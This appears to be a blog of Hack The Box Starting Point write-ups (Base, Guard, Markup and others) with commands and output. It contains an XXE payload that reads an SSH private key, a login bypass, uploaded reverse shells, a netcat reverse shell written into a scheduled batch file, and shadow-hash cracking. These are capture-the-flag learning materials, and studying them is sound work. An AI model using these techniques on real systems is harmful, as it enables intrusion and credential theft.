 msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Command shell session 1 opened (10.10.14.84:4444 -> 10.129.81.166:34291) at 2021-09-15 20:06:43 +0100
whoami
root

Hallelujah, praise the hack gods. Metasploit successfully created a session on the remote machine and not only that but it looks like we are root too. That means no privilege escalation is required on this machine. Let’s grab the root flag.

cat /root/root.txt
f40--------haXez--------712

We still have to submit the user flag so we need to go hunting for it. Let’s check home directory and see if there are any users and whether any of them is hiding the user flag.

ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
8af--------haXez--------3fb

Starting Point has been Pwned!

Starting Point on Hack The Box is a collection of “Very Easy” machines designed to give an introduction to the hacking world. This is the red pill that will have you feeling like Alice tumbling down the rabbit hole. Unfortunately, there are multiple rabbit holes and not all of them lead to Wonderland. Alice may have met the Cheshire Cat, but you will encounter many different types of Cat that will assist you on your journey. As Morpheus once said:

“You take the blue pill, the story ends. You wake up in your bed and believe whatever you want to. You take the red pill, you stay in Wonderland, and I show you how deep the rabbit hole goes. Remember, all I’m offering is the truth. Nothing more.”

Morpheus

Let’s begin! My name is Zero Cool (kidding! it’s Joe) and I’ve been working in Cyber for around 2 years (at the time of writing). I’ve worked in tech for almost 10 years doing various jobs but have always been drawn to hacking. These machines continuously taught me new techniques. I have write-ups of each box if you want to check them out but here I will mostly be summarising my experience with the machines.

Archetype

This is a machine that requires you to perform SMB enumeration to get credentials for a MSSQL database. The SMB enumeration was straightforward but I’d never used the Impacket database connection tool before. I wouldn’t have even known about it if it wasn’t for this box. Once authenticated, I needed to use xp_cmdshell to execute a PowerShell command to download a reverse shell PowerShell script. After the reverse shell had connected back to my machine, further enumeration was required to grab the Administrator password from the history. This machine was a lot of fun and I learnt about some new tools.

Starting Point Oopsie

This machine required me to leverage broken access control restrictions to impersonate another, higher privilege user. This one was done using the tool Burp Suite. I’m quite familiar with Burp Suite but have never encountered a situation quite like this before. I’ve brute-forced parameters before to get APIs to dump information that they shouldn’t, but this was fairly unique. Once I was able to impersonate super admin it was possible to upload a reverse shell and have the machine connect back to me. Escalating privileges to root required manipulating a script that wasn’t calling a tool by its full path. This was something I had done before but am not overly confident doing. I enjoyed this box as understanding the vulnerabilities was straightforward.

Starting Point Vaccine

This was the next target to succumb to my amateur hacking skills. This machine required downloading a password protected ZIP archive from FTP and then using tools to generate and crack the password hash of the ZIP. The ZIP contained a PHP index file which had some hardcoded MD5-hashed credentials. The MD5 was cracked and then it was possible to log in to the website. The next step was to perform an SQL injection attack while passing it my session cookie. The SQL injection was used to get a shell on the machine, which was then upgraded using bash. I then grabbed the postgres password and switched to that user. Postgres had the sudo ability to edit a particular file with vi, which I exploited to escape to root.

Starting Point Shield

This was the next victim on the list and gave me more trouble than I expected. This machine required exploiting WordPress by adding a backdoor to one of the theme's PHP files. Once the backdoor was embedded it was possible to command it to download and execute a reverse shell. Once on the machine I discovered that I had to use JuicyPotato to execute nc.exe to spawn a privileged reverse shell. I had not used JuicyPotato before and had a bit of trouble choosing which process to attach it to. I'm not entirely certain how it works yet, so I need to do more research on it. This box was a lot of fun though and taught me about JuicyPotato.

Starting Point Pathfinder

This machine was next on my hit list and was my first encounter with a Domain Controller during the Starting Point series. I've pen tested domain controllers before, so I sort of knew what to look out for. There were several ports that I targeted right away, but the service I needed to poke was LDAP. Using the tool ldapdomaindump and authenticating as Sandra, it was possible to dump user information. Then, using another tool from Impacket, it was possible to trick the server into giving me a user hash which I cracked offline. With the hash cracked it was possible to perform a DCSync attack and grab the Administrator hash, which gave us full access. This was a great box which I feel simulates configuration weaknesses that you might find in the real world.

Starting Point Included

This machine was next to get isolated and hacked by my 1337 haxor skills. Seriously though, this was another fun box that leveraged directory traversal, or local file inclusion. The foothold was obvious initially due to the naming convention of the parameter used to call the index file. The machine had TFTP running, so it was possible to put a reverse shell on it. By leveraging the local file inclusion attack to determine the path of the TFTP directory, it was possible to call the reverse shell.

Starting Point Markup

This was a fun machine that taught me about XML entity injection. I need to brush up on this subject, so I'm going to check out the PortSwigger Web Security Academy labs on it. The XXE attack allowed me to retrieve a user's private key which I could then use to SSH to the box. After running winPEAS I found a file that the user had access to that was running as a scheduled task. Furthermore, we could echo content into this file, so we dropped a netcat executable on the machine. I then echoed a command into the file so that it would create a reverse shell back to our machine the next time it ran. Great box, but I ran into a few issues with it. Check out the post for more details.

Starting Point Guard

This was a relatively simple machine with a neat trick for privilege escalation. This machine used credentials from the previous machine to gain SSH access. Once on the box I needed to use the built-in shell escape in man pages to break out of the restricted shell and cat the user flag. The shell was still restricted as I was unable to use wget or curl to download any files. I used SSH to pipe LinPEAS on to the machine. LinPEAS found that root logins were permitted with passwords and that my user could access the shadow file with the root hash inside it. Cracking the hash offline allowed me to SSH to the machine as root and capture the root flag.

Starting Point Base

This was the last machine in the Starting Point category on Hack The Box and it was a lot of fun to complete. I will admit that the web application on the machine ran horrendously slowly, which became tiresome at times. Base required me to snoop through listable directories and grab a PHP file containing the source code of the login page. The source code revealed it was written in a vulnerable way that would allow me to bypass the authentication page. By intercepting and manipulating the login request it was possible to access an upload page. After uploading a reverse shell and gaining access to the box I needed to search through the web files and move laterally to the John user. After that it was a GTFOBin on the find command that elevated me to root and allowed me to capture the final flag.

Screenshot: Starting Point has been Pwned!

Conclusion

This was a fun learning experience that made me think about the solutions. I spent a lot of time researching each of the findings and have a huge list of things I still have to look into. I would like to revisit each of the machines once I have levelled up my skillset to see if there are any other ways that they could be completed. I'm drawn to cyber security and hacking like a moth to a flame, so this was a really fun challenge for me. If you have an interest in tech, or are already working in tech and want to improve your skillset, then I highly recommend giving this a go.

Base has been Pwned!

This is the final machine of the Starting Point category on Hack The Box. I've been looking forward to doing this machine since I completed the last one. In traditional techy fashion, however, I've just spent most of the evening trying to work out why my Virtual Machine kept crashing. For some reason it kept producing invalid memory address registers. After an update, a reboot, and some tinkering, it now appears to be fine. That has nothing to do with this though, so let's jump right in.

Reconnaissance

Ok so first, after spawning the machine we ping it to check that it’s online.

└──╼ [★]$ sudo ping 10.10.10.48 | tee -a ping.10.10.10.48.txt
PING 10.10.10.48 (10.10.10.48) 56(84) bytes of data.
64 bytes from 10.10.10.48: icmp_seq=1 ttl=63 time=21.6 ms
64 bytes from 10.10.10.48: icmp_seq=2 ttl=63 time=20.5 ms

The machine is talking to us! We have it right where we want it. Time to hack it with nmap.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.48 | tee -a nmap.10.10.10.48.txx
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 17:41 BST
Nmap scan report for 10.10.10.48
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|_ 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It looks like we have a webserver running on Ubuntu. Before I look at the site, I will launch a dirb scan to check for any interesting directories that we can hack.

└──╼ [★]$ sudo dirb http://10.10.10.48 /usr/share/dirb/wordlists/big.txt -w
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 14 22:51:33 2021
URL_BASE: http://10.10.10.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.10.48/ ----
==> DIRECTORY: http://10.10.10.48/_uploaded/
==> DIRECTORY: http://10.10.10.48/login/
+ http://10.10.10.48/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.10.48/static/
---- Entering directory: http://10.10.10.48/_uploaded/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.48/login/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.48/static/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
==> DIRECTORY: http://10.10.10.48/static/fonts/
==> DIRECTORY: http://10.10.10.48/static/images/

Interesting, it looks like the server is configured to allow directory listings. This is a significant security oversight: it lets us browse the directories and map out the file structure, which could assist with a hack. The setting can easily be changed in the server configuration, but for now let's leverage that weakness and snoop around.

Screenshot: Base directory listing /login
Screenshot: Base directory listing /static

There are some interesting directories and files on the server, one of which is named login.php.swp and contains the following PHP code:

<?php
session_start();
if (!empty($_POST['username']) && !empty($_POST['password'])) {
    require('config.php');
    // Loose == comparison against strcmp(): if the POSTed value is not a
    // string, strcmp() does not return 0 for "equal", it returns NULL,
    // and NULL == 0 is true in PHP 7.
    if (strcmp($username, $_POST['username']) == 0) {
        if (strcmp($password, $_POST['password']) == 0) {
            $_SESSION['user_id'] = 1;
            header("Location: upload.php");
        } else {
            print("<script>alert('Wrong Username or Password')</script>");
        }
    } else {
        print("<script>alert('Wrong Username or Password')</script>");
    }
}

Foothold Hack

It appears as if the username and password are being compared with strcmp(), using a loose == 0 check. By intercepting the request in Burp and turning each parameter into an array, we can make strcmp() misbehave and hopefully bypass authentication. First, we need to navigate to the site and submit a login request. We then need to ensure the browser is configured to send requests to Burp and that Burp intercept is on.
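To see why the array trick works, and what the fix looks like, here is an added example (my code, not the box's login.php): it reproduces the shape of the recovered strcmp() check next to a hardened version and feeds both a normal login and the username[]=&password[]= input. The credentials are constructed placeholders, and the comments note how strcmp() on an array behaves differently on PHP 7 and PHP 8.

```php
<?php
// Added example (not the box's login.php): the recovered strcmp() check
// next to a hardened replacement, exercised with normal and array input.

// Constructed credentials standing in for what config.php would define.
const VALID_USER = 'admin';
const VALID_PASS = 'example-password';

/** Vulnerable: the same shape as the recovered login.php. */
function vulnerable_login($user, $pass): bool
{
    // PHP 7: strcmp() given an array emits a warning and returns NULL, and
    // NULL == 0 is true, so username[]=&password[]= passes both checks.
    // PHP 8: the same call throws a TypeError, which in the real application
    // would surface as a 500 error; it is caught here so the demo still runs.
    try {
        return @strcmp(VALID_USER, $user) == 0
            && @strcmp(VALID_PASS, $pass) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

/** Hardened: reject anything that is not a string, then compare safely. */
function hardened_login($user, $pass): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;               // arrays never reach the comparison
    }
    // A real application should store password_hash() output and call
    // password_verify(); hash_equals() keeps this demo self-contained while
    // still giving a strict, constant-time comparison.
    return hash_equals(VALID_USER, $user) && hash_equals(VALID_PASS, $pass);
}

// Constructed stand-ins for $_POST['username'] and $_POST['password'].
$attempts = [
    'correct credentials'     => ['admin', 'example-password'],
    'wrong password'          => ['admin', 'guess'],
    'username[]=&password[]=' => [[], []],
];

foreach ($attempts as $label => [$user, $pass]) {
    printf("%-26s vulnerable: %-7s hardened: %s\n", $label,
        vulnerable_login($user, $pass) ? 'PASS' : 'denied',
        hardened_login($user, $pass) ? 'PASS' : 'denied');
}
```

On PHP 7 the third row shows the vulnerable check passing with no password at all; the hardened check denies it on every PHP version.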

Screenshot: Base web application login

Second, as soon as Burp has intercepted the request we need to modify it slightly to add our own empty arrays. The square brackets go straight after the username and password parameter names, so the application receives them as arrays. You can see from the screenshot below that I have added an open and close square bracket to each.

Screenshot: Burp intercept showing the array manipulation

Finally, we forward the request, and the subsequent response that sets the session cookie, with Burp and wait for the web application to respond. The page we are redirected to is an upload page. We know from our dirb results that there is an _uploaded directory. If we assume that is where the file upload puts files, then we should be able to upload a reverse shell and hack it from there.

Screenshot: Base upload page

I used pentestmonkey's PHP reverse shell and uploaded it to the application. I started my netcat listener and then curled the URL to trigger the PHP reverse shell.

└──╼ [★]$ sudo curl http://10.10.10.48/_uploaded/shell.php

As expected, the shell worked and I was given access to the box. Before we do anything else, we need to upgrade our shell, so let's run that Python one-liner.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@base:/$

Now that that's sorted, let's check out the rest of the website files. When websites connect to databases, they require a database configuration file. Database configuration files contain passwords that could be used to gain access to sensitive information. There are other files like .htaccess and .htpasswd that could contain sensitive information too, so it's always a good idea to check them.

www-data@base:/$ cat /var/www/html/login/config.php
cat /var/www/html/login/config.php
<?php
$username = "admin";
$password = "thisisagoodpassword";

*Smug grin intensifies* The config.php file contains a password. We know this is the password required to log in to the application, but we don't know whether it has been reused on the system anywhere. With that in mind, let's check the home directory and see what users are on the system.

www-data@base:/$ ls /home
john
www-data@base:/$ ls /home/john
user.txt

Privilege Escalation Hack

Sorry John, but it looks like you are going to be our victim today. I'm sure you're a lovely guy, but if you have reused your password then you deserve to be pwned! (Joking, or am I?) Now that we have a username and password, let's try and switch user to john.

www-data@base:/$ su john
su john
Password: thisisagoodpassword
john@base:/$

I believed in you, john, and you let me down. While we're here, let's grab the user flag from john's home directory.

john@base:/$ cat /home/john/user.txt
cat /home/john/user.txt
0011000100110011<haXez>0011001100110111

With that out of the way, let's see how we can elevate our privileges and grab the root flag. The first thing we need to know is what john can run, besides running his security posture into the ground.

john@base:/$ id
uid=1000(john) gid=1000(john) groups=1000(john)
john@base:/$ sudo -l
[sudo] password for john: thisisagoodpassword
Matching Defaults entries for john on base:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on base:
    (root : root) /usr/bin/find

It appears john has permission to run the find command as root. Shame he couldn't FIND a better password. Moving forward, we should check whether find has any methods of escape, like the one we performed on Guard with the man command. In order to do this, I checked the website GTFOBins, and it says the following command can be used to escape a restricted shell. Hopefully that means it will drop us into a root shell.

john@base:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root

Now all that's left to do is grab the root flag and we're done with Starting Point.

# cat /root/root.txt
0011000100110011<haXez>0011001100110111
Screenshot: Hack The Box Base has been Pwned!

Check out some of my other posts including Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup.

Guard has been Pwned!

haXez is back, back again, hacking machines, tell a friend. That's right, back again with another writeup of a Hack The Box machine. This time we are looking at Guard. Please check out my other posts on Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup if you haven't already done so.

Reconnaissance

Hacking this machine was incredibly fun and it didn't take very long. Let's get straight into it. The first thing I always like to check is whether the box responds to ping requests. This helps to determine whether the machine is online or not.

└──╼ [★]$ sudo ping 10.10.10.50 | tee -a ping.10.10.10.50.txt
[sudo] password for joe:
PING 10.10.10.50 (10.10.10.50) 56(84) bytes of data.
64 bytes from 10.10.10.50: icmp_seq=1 ttl=63 time=37.1 ms
64 bytes from 10.10.10.50: icmp_seq=2 ttl=63 time=21.8 ms
64 bytes from 10.10.10.50: icmp_seq=3 ttl=63 time=21.9 ms
64 bytes from 10.10.10.50: icmp_seq=4 ttl=63 time=22.4 ms

You may notice that I tend to pipe a lot of my commands to tee -a filename.txt. This is a habit I got into after a few exams. I also copy the output into a separate text file called notes. I tend to write the walkthroughs as I hack and it doesn't hurt to have more than one copy of something.

We know the box is responding to pings so let’s see what services are actually listening on the box. We can do this by running an nmap scan.

└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.50 | tee -a nmap.10.10.10.50.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-13 17:06 BST
Nmap scan report for 10.10.10.50
Host is up (0.023s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
| 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_ 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Foothold Hack

The only thing listening on the box appears to be SSH. We could try and brute-force it with Hydra, but I don't think that's the intended approach. Since SSH is the only active service, I'm going to assume that we should already have the credentials from a previous box. The machine Markup had an XXE vulnerability that allowed us to recover an SSH private key for the user daniel. Let's see if that works.

└──╼ [★]$ ssh -i daniel.key daniel@10.10.10.50
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)
Last login: Mon Sep 13 15:38:53 2021 from 10.10.14.31
daniel@guard:~$

Lovely jubbly, the key from the last box worked a treat. We are now on the box, but no matter what I tried I couldn't cat the user.txt file. Something funny was going on. I initially tried to get a shell through Vim, as I have used that technique before, but it turns out man was our man! By opening a man page we can then "escape" to a shell by typing !bash.

Screenshot: escaping from man pages to a shell

And now we can capture the user flag.

daniel@guard:~$ cat user.txt
209**********************081

So what's next? There is a whole lot of file system to look through and not a lot of commands at our disposal. I tried to grab linPEAS from a self-hosted Python web server, but everything I tried in order to download it failed.

daniel@guard:~$ curl http://10.10.14.38/leanpeas.sh
curl: (7) Couldn't connect to server
daniel@guard:~$ ping 10.10.14.38
ping: socket: Permission denied
daniel@guard:~$ http://10.10.14.38/leanpeas.sh
bash: http://10.10.14.38/leanpeas.sh: No such file or directory
daniel@guard:~$ wget http://10.10.14.38/leanpeas.sh
--2021-09-13 16:48:20--  http://10.10.14.38/leanpeas.sh
Connecting to 10.10.14.38:80... failed: Permission denied.
Retrying.

Further Enumeration

Right, it looks like we don't have permission to open a network socket at all. Not good. Well, I guess it's time for some SSH magic. You can pipe commands through SSH, which should allow me to run linPEAS on the remote host from a script on my local system.

└──╼ [★]$ sudo ssh -i daniel.key daniel@10.10.10.50 'bash -s' < /Path/To/linpeas.sh

Honestly, nothing quite beats the feeling you get when you do something hacky and it works. Now that linPEAS was running on the remote host, it was time to go through the output. I noticed some interesting things.

[+] Looking for ssl/ssh files
/home/picasso/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes

Firstly, root could login with a password rather than requiring a public and private key pair. I’m not sure if this is going to make things harder or easier at this point but it’s good to take note of it.

[+] Looking for specific hashes inside files - less false positives (limit 70)
/var/backups/shadow:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1

It looks like linPEAS was able to grab a hash from a backup shadow file. This has got to be the way we get on to the box as root. Let's check out the backup file.

daniel@guard:~$ cat /var/backups/shadow
root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
---SNIP---
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::

Privilege Escalation Hack

I've snipped out the stuff we don't need, and you can see that the backup file contains the hashes for both root and daniel. Ok, let's grab a copy of it and crack it offline. It should be noted that I also noticed I could cat the /etc/passwd file. With that in mind I grabbed a copy of that too, as I was going to use unshadow and attempt to crack it with John the Ripper.

└──╼ [★]$ sudo unshadow passwd.txt shadow.txt > passwords.txt

Unfortunately, John didn’t like the file and was unable to crack them so I switched to hashcat with the rockyou wordlist.

└──╼ [★]$ sudo hashcat -m 1800 --force root.hash /usr/share/wordlists/rockyou.txt
$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv...82hY31
Time.Started.....: Mon Sep 13 17:57:10 2021, (1 min, 3 secs)
Time.Estimated...: Mon Sep 13 17:58:13 2021, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1751 H/s (6.91ms) @ Accel:32 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 110336/14344386 (0.77%)
Rejected.........: 0/110336 (0.00%)
Restore.Point....: 110208/14344386 (0.77%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidates.#1....: pooh-bear -> pashaungu

The password turned out to be "password#1". I honestly think we could have brute-forced that quite quickly, but alas, we were then able to log in to the machine as root and capture the root flag.

└──╼ [★]$ ssh root@10.10.10.50
root@10.10.10.50's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)
Last login: Mon Sep 13 15:50:13 2021 from 10.10.14.31
root@guard:~# cat root.txt
386*******************f681

Markup has been Pwned!

And we're hack to hack the starter track. By that I mean it's time to hack another machine from the Starting Point of Hack The Box. I have been going through the Starting Point machines one by one and so far we have been able to hack Archetype, Oopsie, Vaccine, Shield, Pathfinder and Included. Now it's time to move on to Markup!

This is a great box which took me longer than it should have due to my own mistakes. Oh well, it was great fun and I felt silly after I realised what I was doing wrong.

Reconnaissance

So first we ping.

└──╼ [★]$ sudo ping 10.10.10.49 | tee -a ping.10.10.10.49.txt
[sudo] password for joe:
PING 10.10.10.49 (10.10.10.49) 56(84) bytes of data.
64 bytes from 10.10.10.49: icmp_seq=1 ttl=127 time=240 ms

"IT IS ALIVVEE", so let's go ahead and nmap this sucker.

└──╼ [★]$ sudo nmap -sC -sV -p0- -T4 10.10.10.49
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:

I've snipped out the parts we don't need to see. So we have a web server and Secure Shell running. This is a Windows box, right? Okie dokie, let's take a look at the website.

Screenshot: Markup website login

Ok, so not a lot going on. I had a quick poke at it with Nikto and dirb but I didn't find anything that interesting. Let's try the credentials we recovered from the previous box, Pathfinder.

Screenshot: Markup website login with valid credentials

Ok great, those seem to have worked. The website has some basic functionality that allows you to place orders. If we capture the request and look at it with Burp we can see that it's sending XML. Furthermore, we can perform an XML external entity (XXE) injection attack to receive the contents of the win.ini file.

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>

Screenshot: Burp Repeater performing the XXE attack (Markup XXE Attack 1)
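The defensive side of this is worth seeing in code. As an added example (my code, not the Markup order application, whose source is not on the page), here is a PHP handler for the same <order> format that refuses the DOCTYPE the payload above depends on and never enables entity substitution; the element names follow the payload and the order documents are constructed.

```php
<?php
// Added example, not code from the Markup box: a minimal <order> parser
// that closes off the XXE route used above.

/**
 * Parse an <order> document into its fields, or throw on anything that
 * could pull in external content.
 */
function parse_order(string $xml): array
{
    // First gate: a DTD is never legitimate input for this format, and it
    // is the only place an external entity such as &xxe; can be declared.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    $dom = new DOMDocument();
    libxml_use_internal_errors(true);           // collect, don't print, parse errors
    // LIBXML_NONET forbids network access. LIBXML_NOENT and LIBXML_DTDLOAD
    // are deliberately NOT passed: those are the flags that make libxml
    // substitute entities and fetch external DTDs.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();

    // Second gate: even if the regex were fooled, a parsed doctype or an
    // unexpected root element is rejected before any content is read.
    if (!$ok || $dom->doctype !== null || $dom->documentElement->nodeName !== 'order') {
        throw new InvalidArgumentException('Malformed or unexpected XML');
    }

    $fields = [];
    foreach (['quantity', 'item', 'address'] as $tag) {
        $nodes = $dom->getElementsByTagName($tag);
        if ($nodes->length !== 1) {
            throw new InvalidArgumentException("Expected exactly one <$tag> element");
        }
        $fields[$tag] = trim($nodes->item(0)->textContent);
    }
    if (!preg_match('/^[1-9][0-9]*$/', $fields['quantity'])) {
        throw new InvalidArgumentException('quantity must be a positive integer');
    }
    return $fields;
}

// Constructed inputs: a normal order and the win.ini payload shown on the page.
$benign = '<?xml version="1.0" encoding="UTF-8"?>'
        . '<order><quantity>2</quantity><item>widget</item><address>1 Main St</address></order>';
$xxe    = '<?xml version="1.0" encoding="UTF-8"?>'
        . '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>'
        . '<order><quantity>1337</quantity><item>&xxe;</item><address>haktheplanet</address></order>';

foreach (['benign' => $benign, 'xxe' => $xxe] as $label => $doc) {
    try {
        print_r([$label => parse_order($doc)]);
    } catch (InvalidArgumentException $e) {
        echo "$label rejected: {$e->getMessage()}\n";
    }
}
```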

Foothold Hack

Ok, so we know we can grab files through the XXE attack. What's next? Wasn't there an SSH port open when we performed the nmap scan? Ok, let's find out where Windows stores its SSH keys. By pointing our payload at the .ssh/id_rsa file we should be able to recover the private key.

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'file:///C:/Users/Daniel/.ssh/id_rsa'> ]> <order> <quantity> 1337 </quantity> <item> &xxe; </item> <address> haktheplanet </address> </order>

GIF: XXE used to retrieve the RSA key

Ok, so I grabbed the key and saved it in a file called daniel.key. Make sure to place this in a directory that you own and change the file permissions to 600; you can do that using chmod 600 file.ext. Next we try to SSH to the server with Daniel's key.

GIF: SSH to Markup

Woop, we have access to the box. Let's see if we can grab the user.txt from Daniel's desktop.

└──╼ [★]$ sudo ssh -i daniel.key daniel@10.10.10.49
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

daniel@MARKUP C:\Users\daniel>whoami
markup\daniel

daniel@MARKUP C:\Users\daniel>type C:\Users\Daniel\Desktop\user.txt
032dXXXXXXXXXXXXXXXXX8ef7

We are on the box and have successfully captured the user flag. Now we need to find a way to escalate our privileges to administrator to capture that all-elusive root.txt flag. I downloaded winPEAS and hosted it using Python's http.server module. Once the file was downloaded to the target machine I ran it to see if there were any interesting files.

Screenshot: directory listing containing winPEAS

daniel@MARKUP C:\Users\daniel\Documents>powershell -Command (New-Object Net.WebClient).DownloadFile('http://10.10.14.38/winPEASany.exe', 'win.exe')

GIF: winPEAS running on the machine

Ok, so after a bit of digging around I found a couple of things that I thought would be useful. The first one was a password. It didn't seem to work for the administrator, but yoink, I'll keep that for later.

Screenshot: credentials found by winPEAS

The next thing winPEAS found was an interesting directory and file that all users appeared to have access to.

Screenshot: the interesting file path found by winPEAS

Privilege Escalation Hack

This isn't a typical directory or file that you find on a Windows system, so it was worth investigating. I ran the icacls command on the file to see what permissions were assigned to it.

PS C:\Users\daniel\Documents> icacls C:\Log-Management\job.bat
C:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files

So it looks like the built-in Users group has full control over the file, and that includes daniel. Ok, so let's see what the file is actually doing. Using the type command it was possible to read the contents of the file.

daniel@MARKUP C:\Users\daniel\Documents>type C:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

So the script appears to be an automated script to clear the event logs, but it requires an admin to run it. I had a look at a walkthrough at this point and noticed that others had said the script was running as a scheduled task, and that whatever command you echo into the file would be executed the next time it ran. I had a look at the scheduled tasks and couldn't find it. I ran schtasks and there was nothing in there relating to job.bat. If you know how this was initially found then please let me know.

So with that in mind I set about dropping a copy of netcat on the box using the same method we used to deliver winPEAS.

Invoke-WebRequest http://10.10.14.38/nc64.exe -OutFile nc64.exe

Then, once the file was on the box, I echoed a command into the job.bat file to tell it to execute nc64.exe or nc.exe (whichever you want to use) and connect back to my machine.

So this is where I messed up for the longest time. It was a really really silly mistake too. In order to make my life a bit easier, I upgraded from a Command Prompt session to a PowerShell session. Then whenever I ran the following command:

echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat

It would error and tell me that 'e' was too ambiguous. Who knew the letter e could be so open to interpretation? Well anyway, I spent about an hour enclosing it with quotation marks and all the other stuff you do to try and echo a string into a file. I even went as far as to encode it with base64. The string was being echoed into the file, but the shell wasn't coming back to my local machine. To make matters worse, the file was being overwritten every time it ran, so I felt like there was a problem with the machine.

